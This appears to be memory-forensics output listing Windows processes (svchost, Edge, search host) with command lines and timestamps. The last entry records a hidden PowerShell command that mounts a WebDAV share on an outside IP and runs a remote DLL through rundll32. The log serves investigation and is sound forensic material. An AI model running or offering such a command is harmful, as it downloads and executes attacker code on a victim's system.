13:** 5760	628	svchost.exe	0xc90c0986a2c0	7	-	0	False	2024-07-04 10:45:13.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	-	-
14:** 6016	628	svchost.exe	0xc90c0967d080	9	-	0	False	2024-07-04 10:46:52.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	-	-
15:** 2956	628	svchost.exe	0xc90c08637240	26	-	0	False	2024-07-04 10:44:53.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	-	-
17:** 656	628	svchost.exe	0xc90c07d5f2c0	23	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p	C:\Windows\System32\svchost.exe
18:** 1040	628	svchost.exe	0xc90c07da8280	22	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p	C:\Windows\System32\svchost.exe
20:** 1680	628	svchost.exe	0xc90c0350d080	6	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k appmodel -p	C:\Windows\system32\svchost.exe
21:** 9340	628	svchost.exe	0xc90c09ad4080	3	-	0	False	2024-07-15 04:14:05.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k WbioSvcGroup	C:\Windows\system32\svchost.exe
22:** 1688	628	svchost.exe	0xc90c03509080	5	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	-	-
23:** 1944	628	svchost.exe	0xc90c080cc080	16	-	0	False	2024-07-04 10:44:52.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p	C:\Windows\system32\svchost.exe
24:** 1696	628	svchost.exe	0xc90c03507080	15	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	-	-
25:** 1952	628	svchost.exe	0xc90c080cd080	10	-	0	False	2024-07-04 10:44:52.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	-	-
26:** 2080	628	svchost.exe	0xc90c0821f080	13	-	0	False	2024-07-04 10:44:52.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\System32\svchost.exe -k utcsvc -p	C:\Windows\System32\svchost.exe
27:** 420	628	svchost.exe	0xc90c07d462c0	16	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p	C:\Windows\system32\svchost.exe
34:** 3252	628	svchost.exe	0xc90c08759300	14	-	1	False	2024-07-04 10:44:59.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k UnistackSvcGroup	C:\Windows\system32\svchost.exe
35:** 440	628	svchost.exe	0xc90c07d3e240	73	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k netsvcs -p	C:\Windows\system32\svchost.exe
41:** 832	628	svchost.exe	0xc90c092e2080	7	-	1	False	2024-07-15 07:00:06.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k PrintWorkflow	C:\Windows\system32\svchost.exe
44:** 3148	628	svchost.exe	0xc90c08aad080	11	-	1	False	2024-07-04 10:45:01.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p	C:\Windows\system32\svchost.exe
48:*** 6388	9296	SearchProtocol	0xc90c098dc080	7	-	0	False	2024-07-15 06:58:52.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\SearchProtocolHost.exe	"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe3_ Global\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" 	C:\Windows\system32\SearchProtocolHost.exe
49:*** 4164	9296	SearchProtocol	0xc90c0863a080	4	-	1	False	2024-07-15 04:17:20.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\SearchProtocolHost.exe	"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-3274565340-3808842250-3617890653-10012_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-3274565340-3808842250-3617890653-10012 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"  "1"	C:\Windows\system32\SearchProtocolHost.exe
50:** 1112	628	svchost.exe	0xc90c07dc72c0	41	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k LocalService -p	C:\Windows\system32\svchost.exe
52:** 872	628	svchost.exe	0xc90c07c6f2c0	16	-	0	False	2024-07-04 10:44:50.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k RPCSS -p	C:\Windows\system32\svchost.exe
53:** 6760	628	svchost.exe	0xc90c09408080	8	-	0	False	2024-07-04 10:46:54.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p	C:\Windows\System32\svchost.exe
54:** 1260	628	svchost.exe	0xc90c07e7a2c0	24	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\System32\svchost.exe -k NetworkService -p	C:\Windows\System32\svchost.exe
55:** 1520	628	svchost.exe	0xc90c07f5a2c0	12	-	0	False	2024-07-04 10:44:51.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p	C:\Windows\System32\svchost.exe
57:** 7792	628	svchost.exe	0xc90c08ee8080	3	-	0	False	2024-07-04 10:46:35.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k LocalService -p	C:\Windows\system32\svchost.exe
58:** 764	628	svchost.exe	0xc90c07bef240	23	-	0	False	2024-07-04 10:44:50.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\svchost.exe	C:\Windows\system32\svchost.exe -k DcomLaunch -p	C:\Windows\system32\svchost.exe
87:*** 5488	3656	msedge.exe	0xc90c09380080	59	-	1	False	2024-07-04 10:45:13.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" 	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
88:**** 5792	5488	msedge.exe	0xc90c09916080	10	-	1	False	2024-07-04 10:45:14.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	-	-
89:**** 5088	5488	msedge.exe	0xc90c098c9080	11	-	1	False	2024-07-04 10:46:14.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --field-trial-handle=7556,i,4550380774351628999,14075719362826743519,262144 --variations-seed-version --mojo-platform-channel-handle=7548 /prefetch:8	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
90:**** 1920	5488	msedge.exe	0xc90c0c863080	16	-	1	False	2024-07-15 06:58:45.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	-	-
91:**** 5540	5488	msedge.exe	0xc90c096020c0	8	-	1	False	2024-07-04 10:45:13.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	-	-
92:**** 6404	5488	msedge.exe	0xc90c0cbbd300	15	-	1	False	2024-07-15 06:58:52.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	-	-
93:**** 5768	5488	msedge.exe	0xc90c08eed080	16	-	1	False	2024-07-04 10:45:14.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	-	-
94:**** 1200	5488	msedge.exe	0xc90c03540080	17	-	1	False	2024-07-15 04:02:53.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	-	-
95:**** 4464	5488	msedge.exe	0xc90c0963b080	17	-	1	False	2024-07-15 04:17:28.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=145 --time-ticks-at-unix-epoch=-1720089883345586 --launch-time-ticks=1128944393 --field-trial-handle=10996,i,4550380774351628999,14075719362826743519,262144 --variations-seed-version --mojo-platform-channel-handle=9344 /prefetch:1	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
96:**** 1880	5488	msedge.exe	0xc90c0963a080	17	-	1	False	2024-07-15 04:19:01.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=153 --time-ticks-at-unix-epoch=-1720089883345586 --launch-time-ticks=1222488836 --field-trial-handle=10948,i,4550380774351628999,14075719362826743519,262144 --variations-seed-version --mojo-platform-channel-handle=7820 /prefetch:1	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
97:**** 5780	5488	msedge.exe	0xc90c092ec080	18	-	1	False	2024-07-04 10:45:14.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1928,i,4550380774351628999,14075719362826743519,262144 --variations-seed-version --mojo-platform-channel-handle=2684 /prefetch:3	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
98:**** 7540	5488	msedge.exe	0xc90c095da080	18	-	1	False	2024-07-04 10:45:35.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	-	-
99:**** 10136	5488	msedge.exe	0xc90c0c9b9080	10	-	1	False	2024-07-15 04:18:53.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	-	-
109:1728	6192	MicrosoftEdgeU	0xc90c09722080	4	-	0	True	2024-07-15 04:03:38.000000 UTC	N/A	\Device\HarddiskVolume3\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe	-	-
111:3692	4120	powershell.exe	0xc90c0358b080	17	-	1	False	2024-07-15 07:00:03.000000 UTC	N/A	\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	powershell.exe  -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\3435.dll,entry	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
